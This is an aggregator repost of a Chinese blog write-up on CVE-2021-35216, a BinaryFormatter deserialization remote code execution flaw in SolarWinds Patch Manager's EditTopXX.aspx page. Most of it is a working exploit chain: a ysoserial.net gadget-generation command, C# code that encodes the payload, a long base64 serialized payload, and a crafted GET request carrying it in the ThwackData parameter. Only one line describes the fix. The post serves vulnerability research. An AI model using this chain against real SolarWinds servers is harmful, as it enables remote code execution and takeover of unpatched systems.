16
CVE-2021-35216 SolarWinds PM EditTopXX.aspx RCE
source link: https://y4er.com/post/cve-2021-35216-solarwinds-patch-manager-edittopxx-rce/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CVE-2021-35216 SolarWinds PM EditTopXX.aspx RCE
2021-10-23 代码审计 CVE SolarWinds
同样是使用了Serializer.Deserialize<T>(string serializedObject)
漏洞位于 SolarWinds\Orion\PM\Controls\EditResourceControls\EditTopXX.aspx.cs
同样调用 binaryformatter
ysoserial.net生成payload可以直接打,需要注意只能用get请求发包,所以要用最小的payload。
ysoserial.exe -f binaryformatter -g RolePrincipal --minify -c "ping localhost -t"
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Web;
using System.Web.Mvc;
namespace WebApplication1.Controllers
{
public class HomeController : Controller
{
public ActionResult Index()
{
var payload = HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(
"AAEAAAD/////AQAAAAAAAAAMAgAAAEpTeXN0ZW0uV2ViLFZlcnNpb249NC4wLjAuMCxDdWx0dXJlPW5ldXRyYWwsUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYQUBAAAAIVN5c3RlbS5XZWIuU2VjdXJpdHkuUm9sZVByaW5jaXBhbAEAAAAqU3lzdGVtLlNlY3VyaXR5LkNsYWltc1ByaW5jaXBhbC5JZGVudGl0aWVzAQIAAAAGAwAAANgFQUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFCdE5hV055YjNOdlpuUXVVRzkzWlhKVGFHVnNiQzVGWkdsMGIzSUZBUUFBQUVKTmFXTnliM052Wm5RdVZtbHpkV0ZzVTNSMVpHbHZMbFJsZUhRdVJtOXliV0YwZEdsdVp5NVVaWGgwUm05eWJXRjBkR2x1WjFKMWJsQnliM0JsY25ScFpYTUJBQUFBRDBadmNtVm5jbTkxYm1SQ2NuVnphQUVDQUFBQUJnTUFBQUNIQXp4UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJZ1RXVjBhRzlrVG1GdFpUMGlVM1JoY25RaUlIaHRiRzV6UFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkM5d2NtVnpaVzUwWVhScGIyNGlJSGh0Ykc1ek9tRTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJK1BFOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OFlUcFFjbTlqWlhOelBqeGhPbEJ5YjJObGMzTXVVM1JoY25SSmJtWnZQanhoT2xCeWIyTmxjM05UZEdGeWRFbHVabThnUVhKbmRXMWxiblJ6UFNJdll5QndhVzVuSUd4dlkyRnNhRzl6ZENBdGRDSWdSbWxzWlU1aGJXVTlJbU50WkNJdlBqd3ZZVHBRY205alpYTnpMbE4wWVhKMFNXNW1iejQ4TDJFNlVISnZZMlZ6Y3o0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNqNEwL"));
Response.Write(payload);
return View();
}
}
public class Serializer
{
// Token: 0x06000295 RID: 661 RVA: 0x0000B64C File Offset: 0x0000984C
public static string Serialize(object parameters)
{
string result;
using (MemoryStream memoryStream = new MemoryStream())
{
new BinaryFormatter().Serialize(memoryStream, parameters);
result = Base64Helper.Base64Encode(memoryStream.ToArray());
}
return result;
}
// Token: 0x06000295 RID: 661 RVA: 0x0000B7E8 File Offset: 0x000099E8
public static T Deserialize<T>(string serializedObject)
{
T result;
using (Stream stream = new MemoryStream(Base64Helper.Base64Decode(serializedObject)))
{
result = (T) ((object) new BinaryFormatter().Deserialize(stream));
}
return result;
}
}
internal class Base64Helper
{
// Token: 0x060002AC RID: 684 RVA: 0x0000C819 File Offset: 0x0000AA19
public static string Base64Encode(byte[] str)
{
return HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(Convert.ToBase64String(str)));
}
// Token: 0x060002AD RID: 685 RVA: 0x0000C830 File Offset: 0x0000AA30
public static byte[] Base64Decode(string str)
{
byte[] bytes = HttpServerUtility.UrlTokenDecode(str);
return Convert.FromBase64String(Encoding.UTF8.GetString(bytes));
}
}
}
构造请求如下
http://192.168.137.130:8787/Orion/PM/Controls/EditResourceControls/EditTopXX.aspx?ThwackData=QUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFFcFRlWE4wWlcwdVYyVmlMRlpsY25OcGIyNDlOQzR3TGpBdU1DeERkV3gwZFhKbFBXNWxkWFJ5WVd3c1VIVmliR2xqUzJWNVZHOXJaVzQ5WWpBelpqVm1OMll4TVdRMU1HRXpZUVVCQUFBQUlWTjVjM1JsYlM1WFpXSXVVMlZqZFhKcGRIa3VVbTlzWlZCeWFXNWphWEJoYkFFQUFBQXFVM2x6ZEdWdExsTmxZM1Z5YVhSNUxrTnNZV2x0YzFCeWFXNWphWEJoYkM1SlpHVnVkR2wwYVdWekFRSUFBQUFHQXdBQUFOZ0ZRVUZGUVVGQlJDOHZMeTh2UVZGQlFVRkJRVUZCUVVGTlFXZEJRVUZDZEU1aFYwNTVZak5PZGxwdVVYVlZSemt6V2xoS1ZHRkhWbk5pUXpWR1drZHNNR0l6U1VaQlVVRkJRVVZLVG1GWFRubGlNMDUyV201UmRWWnRiSHBrVjBaelZUTlNNVnBIYkhaTWJGSnNaVWhSZFZKdE9YbGlWMFl3WkVkc2RWcDVOVlZhV0dnd1VtMDVlV0pYUmpCa1IyeDFXakZLTVdKc1FubGlNMEpzWTI1U2NGcFlUVUpCUVVGQlJEQmFkbU50Vm01amJUa3hZbTFTUTJOdVZucGhRVVZEUVVGQlFVSm5UVUZCUVVOSVFYcDRVRmx0Y0d4Wk0xSkZXVmhTYUZWSVNuWmtiV3hyV2xoSloxUlhWakJoUnpsclZHMUdkRnBVTUdsVk0xSm9ZMjVSYVVsSWFIUmlSelY2VUZOS2IyUklVbmRQYVRoMll6Sk9iMXBYTVdoamVUVjBZVmRPZVdJelRuWmFibEYxV1RJNWRFd3paSEJpYlZvMFRIcEpkMDFFV1habFIwWjBZa001ZDJOdFZucGFWelV3V1ZoU2NHSXlOR2xKU0doMFlrYzFlazl0UlRsSmJVNXpZMmt4ZFZsWE1XeGpNMEpvV1RKVk5sVXpiSHBrUjFaMFRHdFNjRmxYWkhWaU0wNHdZVmRPZWs4eVJucGpNbFowV1cxNE5WQldUalZqTTFKc1lsTkpLMUJGT1dsaGJWWnFaRVZTYUdSSFJsRmpiVGt5WVZkU2JHTnBOVkJaYlhCc1dUTlNTbUp1VGpCWlZ6VnFXbFEwT0ZsVWNGRmpiVGxxV2xoT2VsQnFlR2hQYkVKNVlqSk9iR016VFhWVk0xSm9ZMjVTU21KdFduWlFhbmhvVDJ4Q2VXSXlUbXhqTTA1VVpFZEdlV1JGYkhWYWJUaG5VVmhLYm1SWE1XeGlibEo2VUZOSmRsbDVRbmRoVnpWdVNVZDRkbGt5Um5OaFJ6bDZaRU5CZEdSRFNXZFNiV3h6V2xVMWFHSlhWVGxKYlU1MFdrTkpkbEJxZDNaWlZIQlJZMjA1YWxwWVRucE1iRTR3V1ZoS01GTlhOVzFpZWpRNFRESkZObFZJU25aWk1sWjZZM28wT0V3d09XbGhiVlpxWkVWU2FHUkhSbEZqYlRreVlWZFNiR05wTlZCWmJYQnNXVE5TU21KdVRqQlpWelZxV2xRME9Fd3dPV2xoYlZacVpFVlNhR1JIUmxGamJUa3lZVmRTYkdOcU5Fd0w1
问了@Jang,他说不记得具体是哪个CVE编号了,但这个洞也是他提交的,也是在35216到35218这一批中的。
改用DataContractSerializer处理序列化,并限定KnowsType。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK